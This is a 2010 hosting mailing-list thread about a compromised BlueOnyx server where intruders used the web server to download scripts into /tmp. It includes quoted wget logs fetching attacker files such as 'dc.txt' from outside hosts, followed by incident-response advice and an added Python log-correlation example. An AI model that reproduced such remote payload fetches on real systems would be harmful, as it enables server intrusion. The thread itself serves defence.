[BlueOnyx:05937] Re: hacker scripts

Ken - Precision Web Hosting, Inc kenlists at precisionweb.net
Mon Nov 29 12:44:28 -05 2010


----- Original Message ----- 
From: "Gerald Waugh" <gwaugh at frontstreetnetworks.com>
To: "BlueOnyx General Mailing List" <blueonyx at blueonyx.it>
Sent: Monday, November 29, 2010 9:28 AM
Subject: [BlueOnyx:05934] Re: hacker scripts


>
> On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote:
>> On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote:
>> > On 29 Nov 2010, at 17:08, Gerald Waugh wrote:
>> > > How can I stop these people from downloading and running their scripts
>> > > in /tmp using httpd
>> >
>> > You need to find out how they did it. You're either hosting someone 
>> > naughty, or someone who has an insecure script. Who owns the files?
>> >
>>   apache.apache
>>
>> The server has a site with Drupal and some other blog stuff
>>
>
> /tmp type ext3 (rw,noexec,nosuid)
>
>
>
> [Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not exist: /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526
> --06:02:38--  http://193.136.136.86/quixplorer/readme.txt
>           => `readme.txt'
> Connecting to 193.136.136.86:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 27,931 (27K) [text/plain]
>
>    0K .......... .......... .......                         100% 56.99 KB/s
>
> 06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]
>
> --06:02:39--  http://realezsites.com/pers/cowtipper524/dc.txt
>           => `dc.txt'
> Resolving realezsites.com... 64.235.52.10
> Connecting to realezsites.com|64.235.52.10|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 2,140 (2.1K) [text/plain]
>
>    0K ..                                                    100% 2.40 MB/s
>
> 06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140]
>
> -- 
> Gerald
>


Look at the time the files in /tmp were created. Then look in your 
access logs and see what site / PHP script was accessed at that time.

Check your Drupal version and search on Google for
"Exploits for Drupal version xxx"


----
Ken M
Precision Web Hosting, Inc.
http://www.precisionweb.net
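
The correlation step suggested in the reply above, sketched as an added example (not code from the thread or from BlueOnyx): it matches each dropped file's timestamp against web requests logged just before it. The Apache common/combined log format, the function names, and the sample log lines are assumptions constructed for illustration.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Assumed format: Apache common/combined log (host, [time], "request", status).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})')

def parse_access_line(line):
    """Return (time, client, request, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    try:
        when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return when, m.group(1), m.group(3), int(m.group(4))

def dropped_file_times(directory="/tmp", owner_uid=None):
    """Map regular files in directory to their ctime (UTC), optionally for one owner."""
    times = {}
    for entry in os.scandir(directory):
        if entry.is_file(follow_symlinks=False):
            st = entry.stat(follow_symlinks=False)
            # ctime, not mtime: wget can set mtime from the remote Last-Modified header.
            if owner_uid is None or st.st_uid == owner_uid:
                times[entry.name] = datetime.fromtimestamp(st.st_ctime, timezone.utc)
    return times

def correlate(file_times, log_lines, before=10, after=1):
    """For each file, return the requests logged shortly before it appeared."""
    parsed = [p for p in map(parse_access_line, log_lines) if p]
    hits = {}
    for name, t in file_times.items():
        lo, hi = t - timedelta(seconds=before), t + timedelta(seconds=after)
        hits[name] = [p for p in parsed if lo <= p[0] <= hi]
    return hits

# Constructed sample data (documentation IPs, hypothetical paths), not from the server.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Nov/2010:06:02:36 -0600] "POST /modules/example.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [29/Nov/2010:05:50:25 -0600] "GET /trio.htm HTTP/1.1" 404 210',
    '192.0.2.10 - - [29/Nov/2010:06:02:38 -0600] "GET /index.php?q=node HTTP/1.1" 200 900',
]
SAMPLE_FILES = {"dc.txt": datetime(2010, 11, 29, 12, 2, 39, tzinfo=timezone.utc)}

if __name__ == "__main__":
    for name, reqs in correlate(SAMPLE_FILES, SAMPLE_LOG).items():
        print(name, [(client, request) for _, client, request, _ in reqs])
```

On a live server, pass the result of `dropped_file_times("/tmp", owner_uid=...)` with the web server user's UID and the lines of each site's access log; a long-running request may need a larger `before` window.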





